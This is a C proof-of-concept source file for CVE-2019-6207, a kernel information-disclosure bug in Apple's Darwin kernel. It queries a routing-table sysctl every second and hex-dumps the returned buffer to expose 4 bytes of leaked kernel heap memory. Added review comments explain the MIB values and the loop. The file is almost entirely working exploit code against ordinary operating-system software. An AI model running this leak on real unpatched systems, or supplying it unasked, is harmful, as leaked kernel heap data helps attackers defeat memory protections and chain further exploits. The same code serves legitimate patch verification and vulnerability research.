CVE-2019-6207.c
//
// main.c
// rt_msghdr2_heapleak
//
// Created by maldiohead on 2018/12/28.
// Copyright © 2018 maldiohead. All rights reserved.
//
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sysctl.h>
#include <sys/syscall.h>

#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
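// Reproducer for the kernel information disclosure tracked as CVE-2019-6207
// (project name: rt_msghdr2_heapleak).
//
// Flow: ask sysctl(3) how many bytes the 6-element MIB below returns, allocate
// a zeroed buffer of that size, then fetch the data once per second and print
// it as a hex dump, 16 bytes per row.
//
// Original author's note: the leaked kernel heap data is at offset 0x20 and is
// 4 bytes long.
// NOTE(review): for patch verification, those 4 bytes are presumably constant
// across iterations on a fixed kernel - confirm against the vendor advisory.
//
// Returns 0 only if the loop ends without error (it normally runs until the
// process is interrupted); returns 1 on any sysctl or allocation failure.
int main(int argc, const char * argv[]) {
    (void)argc;
    (void)argv;

    // MIB values are kept exactly as published.
    // NOTE(review): 0x11 and 0x1e are presumably PF_ROUTE and AF_INET6 on
    // Darwin, and the trailing 2, 2 presumably a NET_RT_* selector plus its
    // argument - confirm against <sys/socket.h> / <net/route.h>.
    int mib[6] = { CTL_NET, 0x11, 0, 0x1e, 2, 2 };

    // Initialised so a failed size query cannot leave it indeterminate.
    size_t len = 0;

    if (sysctl(mib, 6, NULL, &len, NULL, 0) != 0 || len == 0) {
        printf("[*]failed get len!\n");
        return 1;
    }

    // sysctl() rewrites len on every call, so remember the real capacity.
    const size_t cap = len;

    // Zero-filled: any non-zero byte printed later was written by the kernel,
    // not left over from this process's own heap.
    uint8_t *buf = calloc(1, cap);
    if (!buf) {
        printf("[*]failed alloc memory!\n");
        return 1;
    }

    printf("[*]buffer addr:%p length 0x%zx\n", (void *)buf, cap);

    int rc = 0;
    for (;;) {
        len = cap;  // in: buffer capacity, out: bytes actually returned
        if (sysctl(mib, 6, buf, &len, NULL, 0) != 0) {
            // e.g. the table grew past the buffer sized at start-up; stop
            // rather than dump stale or partial data.
            perror("[*]sysctl");
            rc = 1;
            break;
        }

        printf("[*]show leaked data:");
        for (size_t i = 0; i < len; i++) {
            if (i % 0x10 == 0) {
                printf("\n");
            }
            printf("%02x ", (unsigned)buf[i]);
        }
        printf("\n");
        sleep(1);
    }

    free(buf);
    return rc;
}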